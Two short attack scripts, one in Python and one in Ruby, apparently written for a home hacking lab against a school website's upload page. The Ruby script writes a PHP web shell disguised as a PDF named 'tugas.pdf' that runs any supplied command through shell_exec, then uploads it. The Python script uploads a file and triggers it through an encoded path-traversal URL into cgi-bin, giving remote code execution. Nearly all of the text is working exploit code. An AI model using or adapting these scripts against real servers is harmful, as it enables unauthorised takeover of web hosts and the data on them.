File: uploader.py
import os
import sys
import requests


class uploader :

    def __init__(self, ExploitName, Address, UploadPath, UploadNameAttr, UploadLocation) -> None :

        self.ExploitName    = ExploitName
        self.Address        = Address
        self.UploadPath     = UploadPath
        self.UploadNameAttr = UploadNameAttr
        self.UploadLocation = UploadLocation

        self.files = {UploadNameAttr : open(self.ExploitName, 'rb')}


    def upload(self) -> None :

        # http://192.168.137.1/hacklab/websekolah/upload.php

        endpoint = f"http://{self.Address}{self.UploadPath}"

        requests.post(endpoint, files=self.files)


    def execute(self) :

        # curl "http://192.168.137.1/cgi-bin/.%%32%65/htdocs/hacklab/websekolah/upload/{self.ExploitName}"

        endpoint = f'http://{self.Address}/cgi-bin/.%%32%65/htdocs{self.UploadLocation}/{self.ExploitName}'

        x=str(os.system(f'curl {endpoint}'))+" "


if __name__ == "__main__" :

    uploader = uploader(
        sys.argv[1],
        sys.argv[2],
        sys.argv[3],
        sys.argv[4],
        sys.argv[5]
    )

    uploader.upload()
    uploader.execute()

File: uploader.rb
require 'net/http/post/multipart'

argv = ARGV


target_uri = URI.parse("http://#{argv.at(0)}:#{argv.at(1)}#{argv.at(2)}")


backdoor_file = "tugas.pdf"
backdoor_code = "#!\"C:\\xampp\\php\\php.exe\"\n<?php\n\techo \"Content-type: text/plain; charset=iso-8859-1\\n\\n\";\n\techo shell_exec(\"" + argv.at(3) + "\");\n?>"

File.write(backdoor_file, backdoor_code)


File.open("./#{backdoor_file}") do | exploit |

  target_request = Net::HTTP::Post::Multipart.new target_uri.path,
    "file" => UploadIO.new(exploit, "multipart/form-data", backdoor_file)

  target_response = Net::HTTP.start(target_uri.host, target_uri.port) do |http|
    http.request(target_request)
  end

end










# endpoint = "http://192.168.137.1/cgi-bin/.%%32%65/htdocs/hacklab/websekolah/upload/#{backdoor_file}"
# system("curl #{endpoint}")
